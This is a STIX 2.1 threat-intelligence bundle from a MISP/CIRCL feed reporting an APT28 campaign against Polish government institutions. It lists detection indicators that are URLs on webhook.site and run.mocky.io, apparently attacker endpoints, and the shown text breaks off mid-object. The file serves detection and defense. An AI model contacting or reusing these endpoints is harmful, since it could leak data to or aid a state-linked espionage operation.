adulau/misp-circl-feed
1
0
Fork 0
Code Issues 1 Pull requests Projects 1 Releases Packages Wiki Activity Actions
misp-circl-feed/feeds/circl/stix-2.1/482a37ad-cfaf-41cc-9bef-b3829dde3b3f.json

2021 lines
100 KiB
JSON
Raw Normal View History

chg: [feeds] updated
2024-08-07 08:13:15 +00:00
{
"type": "bundle",
"id": "bundle--482a37ad-cfaf-41cc-9bef-b3829dde3b3f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:24:05.000Z",
"modified": "2024-05-08T16:24:05.000Z",
"name": "CIRCL",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--482a37ad-cfaf-41cc-9bef-b3829dde3b3f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:24:05.000Z",
"modified": "2024-05-08T16:24:05.000Z",
"name": "OSINT - Kampania APT28 skierowana przeciwko polskim instytucjom rz\u0105dowym",
"published": "2024-05-08T16:24:15Z",
"object_refs": [
"indicator--f0af1be5-d2c8-4ddf-9d57-9bf7dceed0ce",
"indicator--23970f3c-2986-4e12-b55f-c629dac5ebfb",
"indicator--bfc758b1-8afb-47a9-a767-197d6dcc004a",
"indicator--7a1ccc03-2df7-4910-8ab6-f40951ae3a54",
"indicator--d6c193c7-77b0-45a1-91a6-096533a7dedf",
"indicator--71e4b1ed-9eeb-44dd-89fa-4e60a176d6a3",
"indicator--3a3b37ab-7c28-4180-b49e-3405fc48e21d",
"indicator--1b098eb3-6e65-4775-91b2-6dfc35baf929",
"indicator--43fab00f-72bb-451e-bb09-5ba843085dfb",
"indicator--cbce462f-feaf-41a6-90db-9e38b5adc9e2",
"indicator--3c560a1e-1d26-45dd-af08-737305275867",
"indicator--a3bbc289-fcab-49d0-ab03-2a203aa44903",
"indicator--439aa2c4-c37b-415e-85c9-be0f8990e4b4",
"indicator--5c79383a-0631-4f82-88e4-57120f9597b9",
"indicator--4a7fea0d-9558-41d9-b981-90bd88ba4d99",
"indicator--d1ffe610-609e-40f6-87be-4a21d44b090f",
"indicator--ba2aa92c-fc43-4b07-bc20-e0a42f2e4d71",
"indicator--69f76094-9840-4013-8575-3f3c382b1c0f",
"indicator--ff8056f1-4392-4fd7-9b4f-13ab3ae6f68a",
"indicator--0d341018-48fd-4d78-a554-e607cc901dd4",
"indicator--036d34e6-c2d9-448f-8d53-a9311ddca779",
"indicator--dbb31adf-72bb-440c-a697-b6854b432ed1",
"indicator--301d5b93-11e9-4306-9862-7d49419c1ad0",
"indicator--d5d0c2fa-20ae-4f4b-ae30-c7eeb340b2af",
"indicator--310fdbe5-523f-4b48-ba70-ce9f25c74876",
"indicator--a8c11946-d787-437c-be15-bf8c454ce1b3",
"indicator--3f269f7c-2d0e-4a9f-acc7-6132f24ac8eb",
"indicator--72ab91d7-e187-4932-b069-a489d120bb85",
"indicator--61100d52-cca2-4cdf-bf3f-ff8a133e01c4",
"indicator--ddc055aa-b7fa-408f-b19d-678f015ffd46",
"indicator--9cc77420-c9c0-4b64-b96e-67ddacf80263",
"indicator--164b007d-2dde-4362-acf5-204ab51e0cef",
"indicator--413e49e1-6430-41d7-a3b0-52aff962ead9",
"indicator--0515787f-aa33-4099-9c69-fa76b3cf5ecd",
"indicator--55bdfb1f-0650-4312-9f89-785d6dcc4eec",
"indicator--529af1e0-a4c6-4d7f-8db9-e15c262130a4",
"indicator--b73b5534-0ebb-4516-a112-263e3f9e8b71",
"indicator--8fc240e5-c496-4027-b9ce-2bf83632f084",
"indicator--e02fd994-a773-46cd-ad55-c1cc542c9861",
"indicator--4b228653-3eef-4646-b8ff-76d6c1bfeb32",
"indicator--a5bf9b3e-3b08-4e06-b2b4-585239b73b05",
"indicator--a29f2969-d1e9-4b3f-a96b-5c1a8348a7f3",
"indicator--3766bd1a-2bef-493b-bd2e-a73a914e4b54",
"indicator--82038fdd-a441-4c72-a1da-f101ded09359",
"indicator--d58f687b-98d0-460f-a87d-2d45b7fbcaa9",
"indicator--2a5ee9a3-916c-4992-ab21-033dd67b6833",
"indicator--d092b3d7-6adf-4a2e-973c-0e17a5c4d4cc",
"indicator--50ff16f1-a066-4a6c-8497-212e69bc2d18",
"indicator--aaf5a34f-eebc-41f2-8abd-b7286c0ba236",
"indicator--759bb98f-4791-4ef8-bbee-c0ad4df19e01",
"indicator--ef6ba0b7-6e5e-4df8-aee7-7c857a1f3f8b",
"indicator--e03676a9-bcba-4136-a229-40ef123c6564",
"indicator--1e584f6d-896b-4b68-81c3-29f18dc32a5a",
"indicator--4506ab04-f5a2-403f-8ca2-c043ed14869d",
"indicator--3fef157a-3ec0-488f-b19e-c5c8a976b1f8",
"indicator--5f90086f-8e2b-43c3-879d-002820a9a6ee",
"indicator--3283e384-fb80-405a-bac8-93d414a7f13d",
"indicator--ac3a0e68-fa29-443c-81b6-46f75050691d",
"indicator--9d3bab3c-cc97-483a-8589-197fe2b4748b",
"indicator--9207ec19-9539-44c8-979f-bc9823719f8f",
"indicator--452bf54b-7705-4904-ae1e-de8956d2dcbd",
"indicator--f63530e6-b96e-4281-8e2e-a1d7e82f3f52",
"indicator--ddb9803a-4f2f-41fd-8600-0fd56884423a",
"indicator--292ce6ae-7b5f-4b37-a2ac-e23847020f54",
"indicator--ea8a8fa8-bc27-4dd6-8d11-2ed614c079b0",
"indicator--771fc0bc-0722-4fde-8fa4-0119dc11f39d",
"indicator--f9ce542f-76a9-4733-96ad-e0337b8084da",
"indicator--d4434be0-d0bf-4494-a050-5163e1a00501",
"indicator--d469acd5-a763-4815-910f-e281b8703d42",
"indicator--b6711c34-69d4-45d7-8af0-1fa3a6cd3450",
"indicator--831cd969-7ac2-4c31-98b2-1df34dc9440c",
"indicator--21f77deb-4015-4375-8f95-068e49df10f9",
"indicator--667464be-8206-4e37-859f-adda50016e83",
"indicator--4c6e4ae6-993d-49c0-8ae7-74bbc51f9849",
"indicator--a90b87b4-5afa-460c-b3b7-c2ae9d6b3334",
"indicator--cba32fe0-9818-41f5-b607-7eded83314f9",
"indicator--b80aa835-216b-4c6a-8837-c3bb28da8718",
"indicator--a93c737d-21a6-412b-a920-a68b8e57590d",
"indicator--c7737529-d089-43b9-9ef1-f5cfdb11bd64",
"indicator--29f885e5-676a-4eac-b824-694d79adada6",
"x-misp-object--ee17c073-f9a9-4be9-a7fc-ee2571e44da6",
"note--2d5b8eaf-a5c9-49e3-92be-aed19adeddb4"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"misp-galaxy:threat-actor=\"APT28\"",
"type:OSINT",
"osint:lifetime=\"perpetual\"",
"tlp:clear"
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--f0af1be5-d2c8-4ddf-9d57-9bf7dceed0ce",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:58.000Z",
"modified": "2024-05-08T16:00:58.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=2d07e34c-3dd3-45e8-865c-3888a65ab885']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:58Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--23970f3c-2986-4e12-b55f-c629dac5ebfb",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/2d07e34c-3dd3-45e8-865c-3888a65ab885']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--bfc758b1-8afb-47a9-a767-197d6dcc004a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/4ba464d9-0675-4a7a-9966-8f84e93290ba']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--7a1ccc03-2df7-4910-8ab6-f40951ae3a54",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/577b82c3-7249-44e9-9353-5eab106fead6']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d6c193c7-77b0-45a1-91a6-096533a7dedf",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=127df518-52be-46c5-bbb2-0479f4b9693b']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--71e4b1ed-9eeb-44dd-89fa-4e60a176d6a3",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/127df518-52be-46c5-bbb2-0479f4b9693b']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3a3b37ab-7c28-4180-b49e-3405fc48e21d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/0ef0dcf7-f258-4d02-b274-cbf62a2000cf']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--1b098eb3-6e65-4775-91b2-6dfc35baf929",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=c1112bb3-0e6e-4ba4-abe7-fb31388b47ad']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--43fab00f-72bb-451e-bb09-5ba843085dfb",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/c1112bb3-0e6e-4ba4-abe7-fb31388b47ad']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--cbce462f-feaf-41a6-90db-9e38b5adc9e2",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/3f396db1-2016-4b69-9ec3-ffc417d5f3aa']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3c560a1e-1d26-45dd-af08-737305275867",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/66ea3bbc-29dc-4ece-b804-71c6ec7b77b6']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a3bbc289-fcab-49d0-ab03-2a203aa44903",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=efb79108-a2b5-4cba-844d-6352bb8fad8c']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--439aa2c4-c37b-415e-85c9-be0f8990e4b4",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/efb79108-a2b5-4cba-844d-6352bb8fad8c']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5c79383a-0631-4f82-88e4-57120f9597b9",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/9c87649c-220d-425d-8331-ffc8d9b94a38']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--4a7fea0d-9558-41d9-b981-90bd88ba4d99",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/c618ea32-2923-4c12-8151-8d0002b56af0']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d1ffe610-609e-40f6-87be-4a21d44b090f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=f97bcee0-0d91-4503-a30c-027f1b34820f']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ba2aa92c-fc43-4b07-bc20-e0a42f2e4d71",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/f97bcee0-0d91-4503-a30c-027f1b34820f']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--69f76094-9840-4013-8575-3f3c382b1c0f",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/9a9cdaf8-120c-4de9-b17a-d6d8e2796a3b']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ff8056f1-4392-4fd7-9b4f-13ab3ae6f68a",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/e13d23aa-b6f8-4491-9adc-71f7f8c438df']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--0d341018-48fd-4d78-a554-e607cc901dd4",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5e4c7949-30a2-4477-9e9b-e8828fc76a1b']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--036d34e6-c2d9-448f-8d53-a9311ddca779",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/5e4c7949-30a2-4477-9e9b-e8828fc76a1b']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--dbb31adf-72bb-440c-a697-b6854b432ed1",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=5100fcc0-f6be-4b09-8c58-5a8a6706ec4f']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--301d5b93-11e9-4306-9862-7d49419c1ad0",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/5100fcc0-f6be-4b09-8c58-5a8a6706ec4f']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--d5d0c2fa-20ae-4f4b-ae30-c7eeb340b2af",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/7674f06b-e435-4470-a594-6d59578c552d']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--310fdbe5-523f-4b48-ba70-ce9f25c74876",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a8c11946-d787-437c-be15-bf8c454ce1b3",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=508da0df-7ec9-420e-b1fe-958fbbe699d1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3f269f7c-2d0e-4a9f-acc7-6132f24ac8eb",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/508da0df-7ec9-420e-b1fe-958fbbe699d1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--72ab91d7-e187-4932-b069-a489d120bb85",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/bec23763-b8d9-4191-99ba-04a4a163b4de']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--61100d52-cca2-4cdf-bf3f-ff8a133e01c4",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/90fea98f-fbdb-4847-be03-409d02a43caf']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--ddc055aa-b7fa-408f-b19d-678f015ffd46",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://run.mocky.io/v3/87f277a5-a081-4976-8e12-351b6c02a903?q=bc349b93-b047-42f8-a421-d45e3ec94dc5']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--9cc77420-c9c0-4b64-b96e-67ddacf80263",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/bc349b93-b047-42f8-a421-d45e3ec94dc5']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--164b007d-2dde-4362-acf5-204ab51e0cef",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/5a8758c6-5702-4fea-9d5e-4fbdb6dd795f']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--413e49e1-6430-41d7-a3b0-52aff962ead9",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:00:59.000Z",
"modified": "2024-05-08T16:00:59.000Z",
"pattern": "[url:value = 'https://webhook.site/b10bd697-1a9f-4ec7-aa2f-1fa84ad916a1']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:00:59Z",
"kill_chain_phases": [
{
